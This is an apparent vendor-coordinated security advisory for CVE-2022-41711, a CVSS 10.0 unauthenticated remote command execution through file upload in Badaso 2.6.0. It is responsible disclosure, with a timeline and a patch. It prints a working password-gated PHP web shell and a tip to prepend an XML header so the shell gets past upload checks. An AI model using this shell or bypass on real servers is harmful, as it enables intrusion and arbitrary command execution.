Badaso 2.6.0 - Remote Command Execution

Summary

NameBadaso 2.6.0 - RCE
Code nameHarlow
ProductBadaso
Affected versionsVersion 2.6.0
StatePublic
Release date2022-10-18

Vulnerability

KindRemote command execution
Rule004. Remote command execution
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score10.0
Exploit availableYes
CVE ID(s)CVE-2022-41711

Description

Badaso version 2.6.0 allows an unauthenticated remote attacker to execute arbitrary code remotely on the server. This is possible because the application does not properly validate the data uploaded by users.

Vulnerability

This vulnerability occurs because the application does not correctly validate files uploaded by users. Thanks to this, we uploaded a file with malicious PHP code, instead of an image file.

Exploitation

To exploit this vulnerability, the following file must be sent to the server:

exploit.php

<?xml version="1.0" standalone="no"?>
<?php
    if($_POST && $_POST['password']==="AGSH635479302H235") {
        echo system($_POST['cmd']);
    }
?>

It is important to put an XML header before the malicious code to bypass security controls.

Evidence of exploitation

RCE-badaso

image

Our security policy

We have reserved the CVE-2022-41711 to refer to this issue from now on.

System Information

  • Version: Badaso 2.6.0

  • Operating System: GNU/Linux

Mitigation

An updated version of Badaso is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/uasoft-indonesia/badaso

Issue https://github.com/uasoft-indonesia/badaso/issues/802

Timeline

Time-lapse-logo

2022-10-05

Vulnerability discovered.

Time-lapse-logo

2022-10-05

Vendor contacted.

Time-lapse-logo

2022-10-05

Vendor replied acknowledging the report.

Time-lapse-logo

2022-10-05

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-10-11

Vulnerability patched.

Time-lapse-logo

2022-10-18

Public Disclosure.